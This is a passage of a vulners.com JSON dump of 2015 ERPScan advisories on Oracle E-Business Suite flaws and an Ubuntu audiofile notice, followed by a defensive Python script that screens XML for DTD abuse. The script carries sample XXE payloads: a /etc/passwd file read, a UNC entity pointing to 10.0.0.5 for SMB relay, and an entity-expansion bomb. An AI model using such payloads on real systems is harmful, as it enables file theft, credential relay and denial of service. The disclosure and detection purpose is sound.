SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. 
They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. 
Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. 
The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. 
AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase user enumeration\r\nVulnerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari 
discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. 
ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
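The two XXE advisories in the records above (ERPSCAN-15-028 for /OA_HTML/copxml and ERPSCAN-15-030 for /OA_HTML/oramipp_lpr) list the same three abuses of a parser that honours external entities: arbitrary file read through a crafted DTD, denial of service through entity expansion, and NTLM/SMB relay when the entity's SYSTEM identifier points at a host the attacker controls. The script below is an added example written for this page; it is not part of the vulners record or of ERPScan's advisory and says nothing about how either Oracle servlet actually parses XML. It shows the generic server-side screen a practitioner puts in front of any XML parser: walk only the DTD with expat callbacks, never fetch anything, and reject the document if it declares a DOCTYPE at all, naming the specific abuse when one is recognisable. The four sample payloads are constructed for the demo (the UNC-path form is the usual way an external entity is aimed at an SMB listener; the advisory does not show its payload), and MAX_ENTITY_EXPANSION is an assumed policy constant chosen small enough to trip on a tiny entity bomb.

```python
"""Added example (not from the advisory): screen XML for DTD abuse before parsing it.

Standard library only.  The DTD is walked with expat callbacks and nothing is
ever fetched, so inspecting a hostile document is safe.
"""
import re
import xml.parsers.expat as expat

# Assumed policy constant: the most characters a single entity may expand to.
# Production parsers use far larger limits; 1000 keeps the demo payload small.
MAX_ENTITY_EXPANSION = 1000

# General entity references (&name;) inside an entity's raw replacement text.
ENTITY_REF = re.compile(r"&([A-Za-z_:][\w.:-]*);")


def classify_system_id(sysid):
    """Map an external entity's SYSTEM identifier to the abuse it enables."""
    low = sysid.lower()
    if sysid.startswith("\\\\") or low.startswith("file:////"):
        return "UNC path -> NTLM/SMB relay"   # parser authenticates to attacker's share
    if low.startswith("file:"):
        return "local file read"
    if low.startswith(("http:", "https:", "ftp:")):
        return "SSRF"
    return "unknown scheme"


def _expanded_length(name, values, memo, active):
    """Static size of entity `name` once every nested reference is expanded."""
    if name in memo:
        return memo[name]
    if name in active:  # recursive reference: illegal XML, treat as worst case
        return MAX_ENTITY_EXPANSION + 1
    active.add(name)
    text = values[name]
    size, pos = 0, 0
    for m in ENTITY_REF.finditer(text):
        size += m.start() - pos
        ref = m.group(1)
        if ref in values:
            size += _expanded_length(ref, values, memo, active)
        else:  # predefined (&amp;) or undeclared: count the literal reference
            size += len(m.group(0))
        pos = m.end()
    size += len(text) - pos
    active.discard(name)
    memo[name] = size
    return size


def inspect_xml(document):
    """Report what the DTD of `document` (bytes) declares and give a verdict."""
    report = {"has_doctype": False, "external": [], "max_expansion": 0, "verdict": "accept"}
    values = {}  # internal entity name -> raw replacement text (refs unexpanded)
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["has_doctype"] = True
        if sysid or pubid:  # an external DTD subset is itself an XXE vector
            report["external"].append(("DOCTYPE " + name, sysid or pubid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid or pubid:
            report["external"].append((name, sysid or pubid))
        else:
            values[name] = value or ""

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # Claim every external reference as handled so expat moves on without fetching.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: True

    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        report["verdict"] = "reject: malformed (%s)" % exc
        return report

    memo = {}
    for name in values:
        report["max_expansion"] = max(
            report["max_expansion"], _expanded_length(name, values, memo, set()))

    if report["external"]:
        kinds = sorted({classify_system_id(s) for _, s in report["external"]})
        report["verdict"] = "reject: external entity (%s)" % "; ".join(kinds)
    elif report["max_expansion"] > MAX_ENTITY_EXPANSION:
        report["verdict"] = "reject: entity expansion (%d chars)" % report["max_expansion"]
    elif report["has_doctype"]:
        report["verdict"] = "reject: DTD not allowed"
    return report


# Constructed sample payloads: one per abuse the advisories list, plus a clean document.
FILE_READ = (b'<?xml version="1.0"?>\n'
             b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
             b'<order><note>&xxe;</note></order>')
SMB_RELAY = (b'<?xml version="1.0"?>\n'
             b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "\\\\10.0.0.5\\share\\x.txt"> ]>\n'
             b'<order><note>&xxe;</note></order>')
BOMB = (b'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n'
        b' <!ENTITY lol "lol">\n'
        b' <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n'
        b' <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\n'
        b' <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\n'
        b']>\n<lolz>&lol3;</lolz>')
CLEAN = b'<?xml version="1.0"?>\n<order><note>hello</note></order>'

if __name__ == "__main__":
    for label, doc in [("file read", FILE_READ), ("smb relay", SMB_RELAY),
                       ("bomb", BOMB), ("clean", CLEAN)]:
        print("%-9s -> %s" % (label, inspect_xml(doc)["verdict"]))
```

The policy the verdict encodes is the one OWASP recommends: a document that carries any DOCTYPE is refused, and the external-entity and expansion checks exist only to name the attack in the log. Inside a Java servlet the equivalent is enabling the `http://apache.org/xml/features/disallow-doctype-decl` feature on the DocumentBuilderFactory or SAXParserFactory before parsing; relying on expat's or Xerces' own expansion limits alone still leaves file read, SSRF and the outbound SMB authentication in place.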